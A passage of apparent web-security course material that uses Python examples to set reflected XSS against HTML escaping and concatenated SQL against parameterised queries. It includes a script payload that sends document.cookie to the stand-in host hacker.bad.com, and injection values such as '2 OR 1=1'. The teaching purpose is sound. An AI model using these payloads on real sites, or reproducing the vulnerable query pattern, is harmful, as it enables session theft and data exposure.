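PAYLOAD_URL = "http://www.example.com/search.pl?text=<script>alert(document.cookie)</script>"

# The "cross-site" part: a script that ships the victim's cookies to the attacker's host
EXFIL_PAYLOAD = '<script>new Image().src="http://hacker.bad.com/c?"+document.cookie</script>'


def search_param(url):
    """What search.pl would see as its 'text' parameter."""
    return parse_qs(urlsplit(url).query).get("text", [""])[0]


def render_vulnerable(text):
    # reflects the input verbatim: the attacker's markup becomes part of the page
    return f"<h1>Results for {text}</h1>"


def render_safe(text):
    # output encoding: <, >, &, quotes become entities, so the browser shows text and runs nothing
    return f"<h1>Results for {html.escape(text, quote=True)}</h1>"


def contains_live_script(page):
    """True if the page source still carries a script tag the browser would execute."""
    return "<script" in page.lower()


def session_cookie_header(session_id, httponly=True):
    """HttpOnly keeps document.cookie from revealing the session id even if a
    script does run; it does not stop the script itself."""
    attrs = [f"session={session_id}", "Path=/", "Secure"]
    if httponly:
        attrs.append("HttpOnly")
    return "Set-Cookie: " + "; ".join(attrs)
```

render_vulnerable(search_param(PAYLOAD_URL)) contains the alert script intact; render_safe turns it into "&lt;script&gt;alert(document.cookie)&lt;/script&gt;", which the browser displays as text.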

  50. SQL Injection • In an SQL injection attack the attacker executes commands of his choosing through form fields or URL parameters. • The CGI inserts the input data into a string which is then submitted to an SQL server. The attack adds characters to the input so that extra SQL is executed, or so that the action applies to more database rows than expected. • Example: a web address such as www.example.com/article.asp?id=2 has a file (article.asp), a parameter (id) and a value (2); the value is what the attacker tampers with.
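The article.asp?id=2 example from slide 50 as a runnable query, first with the URL value pasted into the SQL string as the slide describes, then with a bound parameter. This is an added example, not code from the slides; the articles table, its rows and the "published" column are constructed so that the injected OR and UNION have something to expose.

```python
"""Slide 50's article.asp?id=2, concatenated versus parameterised.
Added example, not from the slides; the table and rows are constructed."""
import sqlite3
from urllib.parse import parse_qs, urlsplit


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)",
                     [(1, "First post", 1), (2, "Second post", 1), (3, "Unpublished draft", 0)])
    return conn


def id_param(url):
    """Value of the 'id' parameter, e.g. '2' for .../article.asp?id=2."""
    return parse_qs(urlsplit(url).query).get("id", [""])[0]


def article_vulnerable(conn, value):
    # the CGI concatenates the parameter into the statement: the value is parsed as SQL,
    # so "2 OR 1=1" turns the WHERE clause into (published = 1 AND id = 2) OR 1=1
    sql = "SELECT id, title FROM articles WHERE published = 1 AND id = " + value
    return conn.execute(sql).fetchall()


def article_safe(conn, value):
    # bound parameter: the driver sends the value separately, never as SQL text
    try:
        article_id = int(value)           # the parameter is a number; reject anything else
    except ValueError:
        return []
    return conn.execute("SELECT id, title FROM articles WHERE published = 1 AND id = ?",
                        (article_id,)).fetchall()
```

With id=2 both versions return the second post. With id=2 OR 1=1 the concatenated query returns every row, the unpublished draft included, and a UNION in the value reads any table the database user can see; the parameterised version returns nothing for either.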
